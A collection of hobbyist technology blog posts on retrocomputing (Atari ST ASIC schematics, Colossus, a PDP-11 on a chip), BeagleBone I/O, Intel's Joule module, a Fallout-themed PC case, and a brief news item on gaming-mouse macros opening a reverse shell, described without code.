Atari Archaeology Without Digging Up Landfill Sites

We are fortunate to live in an age of commoditized high-power computer hardware and driver abstraction, in which most up-to-date computers have the ability to do more or less anything that requires keeping up with the attention of a human without breaking a sweat. Processors are very fast, memory is plentiful, and 3D graphics acceleration is both speedy and ubiquitous.

Thirty years ago it was a different matter on the desktop. Even the fastest processors of the day would struggle to perform on their own all the tasks demanded of them by a 1980s teenager who had gained a taste for arcade games. The manufacturers rose to this challenge by surrounding whichever CPU they had chosen with custom co-processors, ASICs that would take away the heavy lifting associated with 2D graphics acceleration, or audio and music synthesis.

One of the 1980s objects of computing desire was the Atari ST, featuring a Motorola 68000 processor, a then-astounding 512k of RAM, a GUI OS, high-res colour graphics, and 3.5″ floppy drive storage. Were you to open up the case of your ST you’d have found those ASICs we mentioned as being responsible for its impressive spec.

Jumping forward three decades, [Christian Zietz] found that there was frustratingly little information on the ST ASIC internal workings. Since a trove of backed-up data became available when Atari closed down he thought it would be worth digging through it to see what he could find. His write-up is a story of detective work in ancient OS and backup software archaeology, but it paid off as he found schematics for not only an ASIC from an unreleased Atari product but for the early ST ASICs he was looking for. He found hundreds of pages of schematics and timing diagrams which will surely take the efforts of many Atari enthusiasts to fully understand, and best of all he thinks there are more to be unlocked.

We’ve covered a lot of Atari stories over the years, but many of them have related to their other products such as the iconic 2600 console. We have brought you news of an open-source ST on an FPGA though, and more recently the restoration of an ST that had had a hard life. The title of this piece refers to the fate of Atari’s huge unsold stocks of 2600 console cartridges, such a disastrous marketing failure that unsold cartridges were taken to a New Mexico landfill site in 1983 and buried. We reported on the 2013 exhumation of these video gaming relics.

A tip of the hat to Hacker News for bringing this to our attention.

Atari ST image, Bill Bertram (CC-BY-2.5) via Wikimedia Commons.

Colossus: Face To Face With The First Electronic Computer

When the story of an invention is repeated as Received Opinion for the younger generation it is so often presented as a single one-off event, with a named inventor. Before the event there was no invention, then as if by magic it was there. That apple falling on Isaac Newton’s head, or Archimedes overflowing his bath, you’ve heard the stories. The inventor’s name will sometimes differ depending on which country you are in when you hear the story, which provides an insight into the flaws in the simple invention tales. The truth is in so many cases an invention does not have a single Eureka moment, instead the named inventor builds on the work of so many others who have gone before and is the lucky engineer or scientist whose ideas result in the magic breakthrough before anyone else’s.

The history of computing is no exception, with many steps along the path that has given us the devices we rely on for so much today. Blaise Pascal’s 17th century French mechanical calculator, Charles Babbage and Ada, Countess Lovelace’s work in 19th century Britain, Herman Hollerith’s American tabulators at the end of that century, or Konrad Zuse’s work in prewar Germany represent just a few of them.

So if we are to search for an inventor in this field we have to be a little more specific than “Who invented the first computer?”, because there are so many candidates. If we restrict the question to “Who invented the first programmable electronic digital computer?” we have a much simpler answer, because we have ample evidence of the machine in question. The Received Opinion answer is therefore “The first programmable electronic digital computer was Colossus, invented at Bletchley Park in World War Two by Alan Turing to break the Nazi Enigma codes, and it was kept secret until the 1970s”.

It’s such a temptingly perfect soundbite laden with pluck and derring-do that could so easily be taken from a 1950s Eagle comic, isn’t it. Unfortunately it contains such significant untruths as to be rendered useless. Colossus is the computer you are looking for, it was developed in World War Two and kept secret for many years afterwards, but the rest of the Received Opinion answer is false. It wasn’t invented at Bletchley, its job was not the Enigma work, and most surprisingly Alan Turing’s direct involvement was only peripheral. The real story is much more interesting.

Continue reading “Colossus: Face To Face With The First Electronic Computer”

A PDP-11 On A Chip

If you entered the world of professional computing sometime in the 1960s or 1970s there is a high probability that you would have found yourself working on a minicomputer. These were a class of computer smaller than the colossal mainframes of the day, with a price tag that put them within the range of medium-sized companies and institutions rather than large corporations or government-funded entities. Physically they were not small machines, but compared to the mainframes they did not require a special building to house them, or a high-power electrical supply.

A PDP-11 at The National Museum Of Computing, Bletchley, UK.
A PDP-11 at The National Museum Of Computing, Bletchley, UK.

One of the most prominent among the suppliers of minicomputers was Digital Equipment Corporation, otherwise known as DEC. Their PDP line of machines dominated the market, and can be found in the ancestry of many of the things we take for granted today. The first UNIX development in 1969 for instance was performed on a DEC PDP-7.

DEC’s flagship product line of the 1970s was the 16-bit PDP-11 series, launched in 1970 and continuing in production until sometime in the late 1990s. Huge numbers of these machines were sold, and it is likely that nearly all adults reading this have at some time or other encountered one at work even if we are unaware that the supermarket till receipt, invoice, or doctor’s appointment slip in our hand was processed on it.

During that over-20-year lifespan of course DEC did not retain the 74 logic based architecture of the earliest model. Successive PDP-11 generations featured ever greater integration of their processor, culminating by the 1980s in the J-11, a CMOS microprocessor implementation of a PDP-11/70. This took the form of two integrated circuits mounted on a large 60-pin DIP ceramic wafer. It was one of these devices that came the way of [bhilpert], and instead of retaining it as a curio he decided to see if he could make it work.

The PDP-11 processors had a useful feature: a debugging console built into their hardware. This means that it should be a relatively simple task to bring up a PDP-11 processor like the J-11 without providing the rest of the PDP-11 to support it, and it was this task that he set about performing. Providing a 6402 UART at the address expected of the console with a bit of 74 glue logic, a bit more 74 for an address latch, and a couple of  6264 8K by 8 RAM chips gave him a very simple but functional PDP-11 on a breadboard. He found it would run with a clock speed as high as 11MHz, but baulked at a 14MHz crystal. He suggests that the breadboard layout may be responsible for this. Hand-keying a couple of test programs, he was able to demonstrate it working.

We’ve seen a lot of the PDP-11 on these pages over the years. Of note are a restoration of a PDP-11/04, this faithful reproduction of a PDP-11 panel emulated with the help of a Raspberry Pi, and an entire PDP-11 emulated on an AVR microcontroller. We have indeed come a long way.

Thanks [BigEd] for the tip.

[Ken Shirriff] Demystifies BeagleBone I/O

If you have ever spent a while delving into the bare metal of talking to the I/O pins on a contemporary microprocessor or microcontroller you will know that it is not always an exercise for the faint-hearted. A host of different functions can be multiplexed behind a physical pin, and once you are looking at the hardware through the cloak of an operating system your careful timing can be derailed in an instant. For these reasons most of us will take advantage of other people’s work and use the abstraction provided by a library or a virtual filesystem path.

If you have ever been curious enough to peer under the hood of your board’s I/O then you may find [Ken Shirriff]’s latest blog post in which he explores the software stack behind the pins on a BeagleBone Black to be of interest. Though its specifics are those of one device, the points it makes have relevance to many other similar boards.

He first takes a look at the simplest way to access a Beagle Bone’s I/O lines, through virtual filesystem paths. He then explains why relying so heavily on the operating system in this way causes significant timing issues, and goes on to explore the physical registers that lie behind the pins. He then discusses the multiplexing of different pin functions before explaining the role of the Linux device tree in keeping operating system in touch with hardware.

For some Hackaday readers this will all be old news, but it’s safe to say that many users of boards like the BeagleBone Black will never have taken a look beyond the safely abstracted ways to use the I/O pins. This piece should therefore provide an interesting education to the chip-hardware novice, and should probably still contain a few nuggets for more advanced users.

We’ve seen a lot of [Ken]’s work here at Hackaday over the years, mostly in the field of reverse engineering. A few picks are his explanation of the TL431 voltage reference, a complete examination of the 741 op-amp, and his reverse engineering of the 1970s Sinclair Scientific calculator.

We appreciate [Fustini]’s tip on this story.

BeagleBone Black image: BeagleBoard.org Foundation [CC BY-SA 3.0], via Wikimedia Commons.

Intel Releases The Tiny Joule Compute Module

At the keynote for the Intel Developers Forum, Intel CEO Brian Krzanich introduced the Intel Joule compute module, a ‘maker board’ targeted at Internet of Things developers. The high-end board in the lineup features a quad-core Intel Atom running at 2.4 GHz, 4GB of LPDDR4 RAM, 16GB of eMMC, 802.11ac, Bluetooth 4.1, USB 3.1, CSI and DSI interfaces, and multiple GPIO, I2C, and UART interfaces. According to the keynote, the Joule module will be useful for drones, robotics, and with support for Intel’s RealSense technology, it may find a use in VR and AR applications. The relevant specs can be found on the Intel News Fact Sheet (PDF).

This is not Intel’s first offering to the Internet of Things. A few years ago, Intel partnered up with Arduino (the Massimo one) to produce the Intel Galileo. This board featured the Intel Quark SoC, a 400MHz, 32-bit Intel Pentium ISA processor. It was x86 in an Arduino format. This was quickly followed by the Intel Edison based on the same Quark SoC, which was followed by the Intel Curie, found in the Arduino 101 and this year’s DEF CON badge.

We’ve seen plenty of Intel’s ‘maker’ and Internet of Things offerings, but we haven’t seen these platforms succeed. You could spend hundreds of thousands of dollars in market research to determine why these platforms haven’t seen much success, but the Hackaday comments will tell you the same thing for free: the documentation for these platforms is sparse, and nobody knows how to make these boards work.

Perhaps because of the failures of Intel’s IoT market, the Joule differs significantly from previous offerings. Although it can be easily compared to the Raspberry Pi, Beaglebone, and a hundred other tiny single board computers, the official literature for the Joule makes a comparison between it and the Nvidia Jetson easy. The Nvidia Jetson is a high-power, credit card-sized ‘supercomputer’ meant to be a building block for high-performance applications, such as drones and anything that requires video or a very fast processor. The Joule fits into this market splendidly, with demonstrated applications including augmented reality safety glasses for Airbus employees and highway patrol motorcycle helmet displays. Here, the Joule might just find a market. This might even be the main focus of the Joule – it can be integrated onto Gumstix carrier boards, providing a custom single board computer with configurable displays, connectors, and sensors.

The Intel Joule lineup consists of the Joule 570x and 550x, with the 550x being a bit slower, a Gig less RAM, and half as much storage. They will be available in Q4 2016 from Mouser, Newegg, and other Intel reseller partners.

Nuka-Cola PC Case Really Glows

It’s hard to imagine a video game series with more potential for cool prop projects than Fallout. The Fallout series has a beautiful and unique art style that is chock full of potential for real-world builds. Pip-Boys, Fat Mans, and power armor projects abound. But, most of these projects are purely aesthetic: something to stick on a shelf and show off to your fellow geeks.

[themitch22] wanted something he could actually use, and what does a geek use more than their computer? Thus, he set out to create a Fallout-themed PC case, and a Nuka-Cola vending machine was the perfect choice for inspiration.

The attention to detail on the build is astounding, with a functional display (powered by a Raspberry Pi), glowing Nuka-Cola Quantum bottles, and weathering to make it feel like it has survived a nuclear apocalypse. He was also kind enough to post pictures of the entire process, which shows how all of the parts were 3D-printed and assembled.

Need some more Fallout goodness to inspire you next build? Check out this amazing Pip-Boy replica we featured last year.

[thanks to Nils Hitze for the tip]

Unexpected Betrayal From Your Right Hand Mouse

Some people really enjoy the kind of computer mouse that would not be entirely out of place in a F-16 cockpit. The kind of mouse that can launch a browser with the gentle shifting of one of its thirty-eight buttons ever so slightly to the left and open their garage door with a shifting to the right of that same button. However, can this power be used for evil, and not just frustrating guest users of their computer?

We’ve heard of the trusted peripheral being repurposed for nefarious uses before. Sometimes they’ve even been modified for more benign purposes. All of these have a common trend. The mouse itself must be physically modified to add the vulnerability or feature. However, the advanced mice with macro support can be used as is for a vulnerability.

The example in this case is a Logitech G-series gaming mouse. The mouse has the ability to store multiple personal settings in its memory. That way someone could take the mouse to multiple computers and still have all their settings available. [Stefan Keisse] discovered that the 100 command limit on the macros for each button are more than enough to get a full reverse shell on the target computer.

Considering how frustratingly easy it can be to accidentally press an auxiliary button on these mice, all an attacker would need to do is wait after delivering the sabotaged mouse. Video of the exploit after the break.

Continue reading “Unexpected Betrayal From Your Right Hand Mouse”